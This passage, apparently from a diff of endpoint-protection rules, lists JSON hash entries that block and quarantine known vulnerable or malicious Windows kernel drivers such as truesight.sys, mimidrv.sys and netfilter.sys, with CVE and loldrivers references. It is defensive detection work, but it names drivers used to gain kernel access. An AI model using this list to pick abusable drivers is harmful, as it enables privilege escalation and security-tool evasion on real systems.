"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153631Z", + "creation_date": "2026-03-23T11:45:31.153633Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "209e1456e53179a845a26b4a065aa3c599d62e661f2333fa7c25ec62d22328f2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69dfec27-d554-5c70-b04f-c8c2152cd167", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984954Z", + "creation_date": "2026-03-23T11:45:29.984957Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984966Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3171d7af852e8b6be4651c415ea9490568475c45ecaa02a33dda9babb1643b07", + "comment": "Dangerous Physmem Kernel Driver (aka BS_Def64.Sys) [https://www.loldrivers.io/drivers/4a80da66-f8f1-4af9-ba56-696cfe6c1e10/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69eb0700-763f-5e83-b7ae-70c29e868481", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827682Z", + "creation_date": "2026-03-23T11:45:30.827684Z", + "enabled": true, 
+ "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827689Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "154edec7928d9b616d12bbdc35f9b2b67b9591f9de4129f41b87f9868868110e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69f8bad3-7f18-5ccb-9af6-b3a9f764a5ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466242Z", + "creation_date": "2026-03-23T11:45:30.466245Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466254Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7824931e55249a501074a258b4f65cd66157ee35672ba17d1c0209f5b0384a28", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a0ab366-74ee-52a6-8050-40b6a8b23686", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967763Z", + "creation_date": "2026-03-23T11:45:29.967765Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967771Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8bc88ce0b5d4b4d42fe51f869b7b4fd34eaa17d04c8058b93b3536129721a129", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a0c75a6-5a18-5412-bb1a-3eaff32ad9fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152236Z", + "creation_date": "2026-03-23T11:45:31.152238Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152247Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": 
null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab93eb13a7362324b0d89549505c747b572382d363ee9c89418a671a56342811", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a24fff6-a7c5-51a3-8301-d792efccc7bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453724Z", + "creation_date": "2026-03-23T11:45:30.453727Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453736Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "00e341c11664a6330122830344bce02aab886143bcaf8f642ab8abc57d80f1e3", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a2fa299-1c5c-5eda-a779-3d3e6dff2041", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143861Z", + "creation_date": "2026-03-23T11:45:31.143863Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143881Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d6c0cce3aef9b8ee4a8323818434c67b1563096ec46738b7475027d582c2b11b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a4ab4c6-344c-5033-928e-c609b0e31a25", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622349Z", + "creation_date": "2026-03-23T11:45:29.622351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622356Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72288d4978ee87ea6c8b1566dbd906107357087cef7364fb3dd1e1896d00baeb", + "comment": "PassMark vulnerable driver (aka 
DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a53ba09-626e-5d84-95ef-d6c1c68b39d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475827Z", + "creation_date": "2026-03-23T11:45:30.475831Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475839Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "00c02901472d74e8276743c847b8148be3799b0e3037c1dfdca21fa81ad4b922", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a56ce7a-0600-5b8f-9eef-5e482e6b45ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810398Z", + 
"creation_date": "2026-03-23T11:45:31.810400Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810405Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b0e6af5764304da088fd609f86da118fbc1372381b5701b907f83400ca69e94", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a59d775-fe31-5e57-a7e1-44b24dd0f624", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468107Z", + "creation_date": "2026-03-23T11:45:30.468111Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468120Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db7a15aa5b85845831dcdcebf837b22cf43fa572dd9cb0bb0d264af519b8d406", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"6a5aeb6a-9beb-5e91-9d3f-0eaf0af44aea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493653Z", + "creation_date": "2026-03-23T11:45:31.493657Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493665Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f868341ee5cb31b1c8d61d246b0c2745fca5a571186fae4ae724837059c32df8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a5c110c-7065-518c-9d85-e301b54f24b4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154024Z", + "creation_date": "2026-03-23T11:45:31.154026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.154031Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad27a4b2ac4df42b49b935e71da004afc7ac7b2779050e2a3b778da1e840a941", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a60ba86-44b0-5b78-b2e5-2dd3df95fdd6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973844Z", + "creation_date": "2026-03-23T11:45:29.973846Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973852Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97b32ddf83f75637e3ba934df117081dd6a1c57d47a4c9700d35e736da11d5bd", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a666cee-2bbc-51ba-932f-f57c86e0c592", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621390Z", + "creation_date": "2026-03-23T11:45:29.621391Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621397Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a6db6d4-b17f-59da-b379-25f08c28a210", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487808Z", + "creation_date": "2026-03-23T11:45:31.487810Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487815Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"39326a1bcb6a96dabcb9dfb519f880680eb39f35ea495618637952507c6dbfec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a71118a-9d04-564d-a915-11bc0f4e7c42", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827774Z", + "creation_date": "2026-03-23T11:45:31.827777Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827786Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "78f415efdf3a409abd1d45320264bde4a1862f56d1cb9216f3e2f9a2d7171809", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a77e505-957c-5c2d-9cdd-96065b21bc3c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146727Z", + "creation_date": "2026-03-23T11:45:32.146729Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146735Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c5400ae731464079590aad494bcf2e0799bb4281ea49baa9580ab2f1ee207861", + "comment": "Vulnerable Kernel Driver (aka ACPIx86.sys) [https://www.loldrivers.io/drivers/fd6c52b1-aeaa-4d89-8051-91acc68c3270/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a7a98f8-e3bf-50a9-ae75-22ca4a7206de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971579Z", + "creation_date": "2026-03-23T11:45:29.971581Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971586Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de99cea1cb680816afa10d2629a8067af1dc289d2d162a21b9dba71eb0e47745", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] 
[https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a7b0d5a-1f35-5d7c-bcd7-b4a6653164a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808631Z", + "creation_date": "2026-03-23T11:45:31.808633Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808639Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8fdc7fe94185ea96f4af7a513d7644ec9cb66cce3207358cbd8dc330caf7bc85", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a7b29ef-b663-5cf5-b3da-4fc999013779", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615849Z", + "creation_date": 
"2026-03-23T11:45:29.615851Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615857Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e5648f892460e2a2a450519b523007ca6973a3679a59c07582aa5bdbd6584d4", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6a8cdd55-f402-5fef-9d29-26b4ab762e66", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823682Z", + "creation_date": "2026-03-23T11:45:30.823684Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823690Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7acc162be849c4f95d8d74c3f5aa97681c62406f604bdc5e3cf4d9993dcfcc80", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"6aa4fec8-482e-59e2-b1a8-082a6b9960c2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967530Z", + "creation_date": "2026-03-23T11:45:29.967532Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967538Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6aaa0071-6503-50ed-b481-ac5658890a6a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609540Z", + "creation_date": "2026-03-23T11:45:29.609541Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
